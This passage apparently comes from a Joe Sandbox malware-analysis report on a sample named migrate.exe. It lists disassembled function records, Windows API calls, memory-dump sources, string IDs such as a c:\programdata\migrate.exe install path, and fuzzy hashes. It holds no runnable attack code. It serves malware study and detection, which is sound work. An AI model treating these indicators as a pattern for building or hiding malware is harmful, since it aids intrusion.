• Instruction Fuzzy Hash: E4F03772A01229BBCB206BA5EC4DDDF7F7DEF427A1B004121B51AE2060D67486D6CBA0
APIs
  • Part of subcall function 001205DA: _wcslen.LIBCMT ref: 001205E0
  • Part of subcall function 0011B92D: _wcsrchr.LIBVCRUNTIME ref: 0011B944
• _wcslen.LIBCMT ref: 0011C197
• _wcslen.LIBCMT ref: 0011C1DF
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _wcslen$_wcsrchr
• String ID: .exe$.rar$.sfx
• API String ID: 3513545583-31770016
• Opcode ID: d961bc82287e74df55fa17d5033a09f60c54cdfceae1ea014c09827ad09964a8
• Instruction ID: d4d1dbfea339cc6c70aa90000b7b86a7254c7f60eea28a5055119e27c0729581
• Opcode Fuzzy Hash: d961bc82287e74df55fa17d5033a09f60c54cdfceae1ea014c09827ad09964a8
• Instruction Fuzzy Hash: A54128255C0361E6C73EAF349842AFAB3B4EF54754F10492EF9916B192E7604DD1C3D2
APIs
• GetTempPathW.KERNEL32(00000800,?), ref: 0012CE9D
  • Part of subcall function 0011B690: _wcslen.LIBCMT ref: 0011B696
• _swprintf.LIBCMT ref: 0012CED1
  • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
• SetDlgItemTextW.USER32(?,00000066,0015946A), ref: 0012CEF1
• EndDialog.USER32(?,00000001), ref: 0012CFFE
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
• String ID: %s%s%u
• API String ID: 110358324-1360425832
• Opcode ID: ff6d2d22cdad6a7e183a7192d89316a2c05b14629a81831b18c7cfd9cc01fb10
• Instruction ID: 62400712121f1200f33bbe5c74e01f69bf59a7f149894f35d213b0308032aad0
• Opcode Fuzzy Hash: ff6d2d22cdad6a7e183a7192d89316a2c05b14629a81831b18c7cfd9cc01fb10
• Instruction Fuzzy Hash: 204168B1900268EADF25DB50EC45EEE77BCEB15341F4080A6FA09E7051EF709A94CFA1
APIs
• _wcslen.LIBCMT ref: 0011BB27
• GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0011A275,?,?,00000800,?,0011A23A,?,0011755C), ref: 0011BBC5
• _wcslen.LIBCMT ref: 0011BC3B
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _wcslen$CurrentDirectory
• String ID: UNC$\\?\
• API String ID: 3341907918-253988292
• Opcode ID: ec1239689fca563e02b00c3cd8ff0d2d75d34f1f4ae403985b49bbace49925a3
• Instruction ID: 870663682e3f85d16208c71f0df0cfe55beedfc9799a50bbd25876ffd44ea341
• Opcode Fuzzy Hash: ec1239689fca563e02b00c3cd8ff0d2d75d34f1f4ae403985b49bbace49925a3
• Instruction Fuzzy Hash: 9E41A231448215BACF25AF60DC81FEB77B9AF55394F104579F864A3152EB70DEE0CAA0
APIs
• LoadBitmapW.USER32(00000065), ref: 0012B6ED
• GetObjectW.GDI32(00000000,00000018,?), ref: 0012B712
• DeleteObject.GDI32(00000000), ref: 0012B744
• DeleteObject.GDI32(00000000), ref: 0012B767
  • Part of subcall function 0012A6C2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0012B73D,00000066), ref: 0012A6D5
  • Part of subcall function 0012A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0012B73D,00000066), ref: 0012A6EC
  • Part of subcall function 0012A6C2: LoadResource.KERNEL32(00000000,?,?,?,0012B73D,00000066), ref: 0012A703
  • Part of subcall function 0012A6C2: LockResource.KERNEL32(00000000,?,?,?,0012B73D,00000066), ref: 0012A712
  • Part of subcall function 0012A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0012B73D,00000066), ref: 0012A72D
  • Part of subcall function 0012A6C2: GlobalLock.KERNEL32(00000000), ref: 0012A73E
  • Part of subcall function 0012A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0012A762
  • Part of subcall function 0012A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0012A7A7
  • Part of subcall function 0012A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0012A7C6
  • Part of subcall function 0012A6C2: GlobalFree.KERNEL32(00000000), ref: 0012A7CD
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
• String ID: ]
• API String ID: 1797374341-3352871620
• Opcode ID: 02350e546d43a41727b614c4675184590f64f1a7c063bc59e3b0898d56b81b37
• Instruction ID: 8a98ad95df63c0eecbfc9869e838f8a0be8f66e7eb912b76c78703cef74cb1ee
• Opcode Fuzzy Hash: 02350e546d43a41727b614c4675184590f64f1a7c063bc59e3b0898d56b81b37
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A01D236940231A7C7127774AC49EBF7BBAAFC0B52F190010F910A72D1DF318D6952B1
APIs
  • Part of subcall function 00111316: GetDlgItem.USER32(00000000,00003021), ref: 0011135A
  • Part of subcall function 00111316: SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
• EndDialog.USER32(?,00000001), ref: 0012D64B
• GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0012D661
• SetDlgItemTextW.USER32(?,00000066,?), ref: 0012D675
• SetDlgItemTextW.USER32(?,00000068), ref: 0012D684
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: ItemText$DialogWindow
• String ID: RENAMEDLG
• API String ID: 445417207-3299779563
• Opcode ID: a53a8a813262ff3b0c73da0bef4b021a9856e1453260b85aa4dd7385aee0372a
• Instruction ID: cd2307495dddd6667fddd5347b9ae604bec1fd6a07ce1f36567f5cb217b87721
• Opcode Fuzzy Hash: a53a8a813262ff3b0c73da0bef4b021a9856e1453260b85aa4dd7385aee0372a
• Instruction Fuzzy Hash: CF014C33244324BBD2204F64FD09F57776DFB5AB01F010014F345A24D0C7A29995E775
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00137E24,?,?,00137DC4,?,0014C300,0000000C,00137F1B,?,00000002), ref: 00137E93
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00137EA6
• FreeLibrary.KERNEL32(00000000,?,?,?,00137E24,?,?,00137DC4,?,0014C300,0000000C,00137F1B,?,00000002,00000000), ref: 00137EC9
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: b5e871086757a4a336bf4654a463df70c2694d87d6500387ae4c80f2e6f1e7b2
• Instruction ID: 8c4e88a475eede2c9b074eade28de91f0b033285a7d2a1b99f377680a208f372
• Opcode Fuzzy Hash: b5e871086757a4a336bf4654a463df70c2694d87d6500387ae4c80f2e6f1e7b2
• Instruction Fuzzy Hash: 18F06875904218FBCF119FA0DC09B9EBFB4EF45715F0441A9F815A31B0DB709E85CA90
APIs
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AdjustPointer$_abort
• String ID:
• API String ID: 2252061734-0
• Opcode ID: 1163a8c37ba2216140e9719fd6d5223efb2dd6a536055771dacb965620c08e3e
• Instruction ID: 35ad2eb4554da853982b38f12cc369e7cf4c38be2f4f2473dd84bc97b8c651c9
• Opcode Fuzzy Hash: 1163a8c37ba2216140e9719fd6d5223efb2dd6a536055771dacb965620c08e3e
• Instruction Fuzzy Hash: 89510472600212AFDB29AF94D845BBAB7B4FF64710F34452DEC06876A1E772ED80D790
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0013BF39
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0013BF5C
  • Part of subcall function 00138E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00134286,?,0000015D,?,?,?,?,00135762,000000FF,00000000,?,?), ref: 00138E38
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0013BF82
• _free.LIBCMT ref: 0013BF95
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0013BFA4
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 8191d205fe39ebe58390619d23ba352102f2a9873c3acaa91a7aa9962b7eb635
• Instruction ID: c3fb3417ea744d5b8b57b605a9a0c2f531987f613a2c424be0b7b5f2287c65d7
• Opcode Fuzzy Hash: 8191d205fe39ebe58390619d23ba352102f2a9873c3acaa91a7aa9962b7eb635
• Instruction Fuzzy Hash: B701DFB66097117FA7211ABA5CCCC7B7A6DEEC7FA0B150129FA04C2210FF60CD0289B0
APIs
• GetLastError.KERNEL32(?,?,?,001391AD,0013B188,?,00139813,00000001,00000364,?,001340EF,?,?,00151098), ref: 0013986E
• _free.LIBCMT ref: 001398A3
• _free.LIBCMT ref: 001398CA
• SetLastError.KERNEL32(00000000,?,00151098), ref: 001398D7
• SetLastError.KERNEL32(00000000,?,00151098), ref: 001398E0
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 170baa0ff66681a44003a0741fb548598ddf17951cbd671ddc9ea4d2a3bc7427
• Instruction ID: 42f46f0df4d51740b1f49782b876b9e8be5ffb3f46d564d968e7ded1c96ce958
• Opcode Fuzzy Hash: 170baa0ff66681a44003a0741fb548598ddf17951cbd671ddc9ea4d2a3bc7427
• Instruction Fuzzy Hash: A201F47A1486096BD31627647C9591B2979DFE3771F310174F515A21A2FFB0CC015261
APIs
  • Part of subcall function 001211CF: ResetEvent.KERNEL32(?), ref: 001211E1
  • Part of subcall function 001211CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 001211F5
• ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00120F21
• CloseHandle.KERNEL32(?,?), ref: 00120F3B
• DeleteCriticalSection.KERNEL32(?), ref: 00120F54
• CloseHandle.KERNEL32(?), ref: 00120F60
• CloseHandle.KERNEL32(?), ref: 00120F6C
  • Part of subcall function 00120FE4: WaitForSingleObject.KERNEL32(?,000000FF,00121101,?,?,0012117F,?,?,?,?,?,00121169), ref: 00120FEA
  • Part of subcall function 00120FE4: GetLastError.KERNEL32(?,?,0012117F,?,?,?,?,?,00121169), ref: 00120FF6
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 1868215902-0
• Opcode ID: a1bb0d29717ed2469efd2c617d6c4cc6de2c68c55f50fcd871f64d5b9753da69
• Instruction ID: 62152260cb68ce6c3c2a1301aaa70749e85d70a0b8f32ad02db09b016a89e642
• Opcode Fuzzy Hash: a1bb0d29717ed2469efd2c617d6c4cc6de2c68c55f50fcd871f64d5b9753da69
• Instruction Fuzzy Hash: 4E019E76000740EFC7329B64ED84BC6BBAAFB08710F000A29F26A92560CB727A94CB50
APIs
• _free.LIBCMT ref: 0013C817
  • Part of subcall function 00138DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?), ref: 00138DE2
  • Part of subcall function 00138DCC: GetLastError.KERNEL32(?,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?,?), ref: 00138DF4
• _free.LIBCMT ref: 0013C829
• _free.LIBCMT ref: 0013C83B
• _free.LIBCMT ref: 0013C84D
• _free.LIBCMT ref: 0013C85F
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 693f6534b9641f89b18f29bc1675f773dbf40c94a17147b941a45ee768f1a14a
• Instruction ID: a7a7626a63a1c89d862b79211de02d85ba3472fe35502af1d5c3fd6a0bdbea33
• Opcode Fuzzy Hash: 693f6534b9641f89b18f29bc1675f773dbf40c94a17147b941a45ee768f1a14a
• Instruction Fuzzy Hash: F1F01232504201ABCA20EBA9F885C1673F9BB11B24F541859F108F7962CB71FD80CB94
APIs
• _wcslen.LIBCMT ref: 00121FE5
• _wcslen.LIBCMT ref: 00121FF6
• _wcslen.LIBCMT ref: 00122006
• _wcslen.LIBCMT ref: 00122014
• CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0011B371,?,?,00000000,?,?,?), ref: 0012202F
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _wcslen$CompareString
• String ID:
• API String ID: 3397213944-0
• Opcode ID: 373adfcbc21e1ba3af74571ba31788f6fd162293bbd14457d20470cf985b187f
• Instruction ID: 6d33663f8d7d7f711a297fdc155d9d8c5bcebe8c9979c0e0df64fd216063bb9f
• Opcode Fuzzy Hash: 373adfcbc21e1ba3af74571ba31788f6fd162293bbd14457d20470cf985b187f
• Instruction Fuzzy Hash: 8BF01D32408024BBCF266F51EC09DCE7F26EB55760F218415F62A5B061CB7296A1D694
APIs
• _free.LIBCMT ref: 0013891E
  • Part of subcall function 00138DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?), ref: 00138DE2
  • Part of subcall function 00138DCC: GetLastError.KERNEL32(?,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?,?), ref: 00138DF4
• _free.LIBCMT ref: 00138930
• _free.LIBCMT ref: 00138943
• _free.LIBCMT ref: 00138954
• _free.LIBCMT ref: 00138965
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 176eb105ddbf4f3f18c333686fd41c3634fa89bdff7554cbf69ae0793696f267
• Instruction ID: 46d0773a90d7a249aed845c3a5863d818a0b973e8a6514a5f860c893dee2094d
• Opcode Fuzzy Hash: 176eb105ddbf4f3f18c333686fd41c3634fa89bdff7554cbf69ae0793696f267
• Instruction Fuzzy Hash: C7F0F8758503269BCE46BF64FC024193FF1F735B24B010646F91CA6AB2CB7189C2DB81
APIs
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _swprintf
• String ID: %ls$%s: %s
• API String ID: 589789837-2259941744
• Opcode ID: 52c48ff2061aa9879653210181ead6f6ad9998bed737977fb366d007feef8d0c
• Instruction ID: 82b987da3a32ce5e09520c28ce4faf07eb45f1c3635da2170ab7b70baca3c9dc
• Opcode Fuzzy Hash: 52c48ff2061aa9879653210181ead6f6ad9998bed737977fb366d007feef8d0c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56515B31288330F6F62D9B90BC86F797265BB34B00F254506F786744E1E7E2A570E71A
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,c:\programdata\migrate.exe,00000104), ref: 00137FAE
                                                                                                                                                                                                    • _free.LIBCMT ref: 00138079
                                                                                                                                                                                                    • _free.LIBCMT ref: 00138083
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                    • String ID: c:\programdata\migrate.exe
                                                                                                                                                                                                    • API String ID: 2506810119-2960915705
                                                                                                                                                                                                    • Opcode ID: 79bf8ad341c615f328e31715cd29b70c16e905f629db797d4997f56fb0aad3b9
                                                                                                                                                                                                    • Instruction ID: 7cba676ab2684e670d52fadbbcc86b066fc93689d469a5ad531fd78163970964
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79bf8ad341c615f328e31715cd29b70c16e905f629db797d4997f56fb0aad3b9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0331A0B1A04318AFDB25DF99D881D9EBBFCEF95310F104066F90897211DBB08E85CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001331FB
                                                                                                                                                                                                    • _abort.LIBCMT ref: 00133306
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EncodePointer_abort
                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                    • API String ID: 948111806-2084237596
                                                                                                                                                                                                    • Opcode ID: 44b9d826d7a8b8fa34e5ecff13b88d76405de0b76a53e90bb66fa70dd872a9db
                                                                                                                                                                                                    • Instruction ID: 8f85618f990e4d24c55720c83d17ea4e81e2b9f87f908645877e69a4f8639b0c
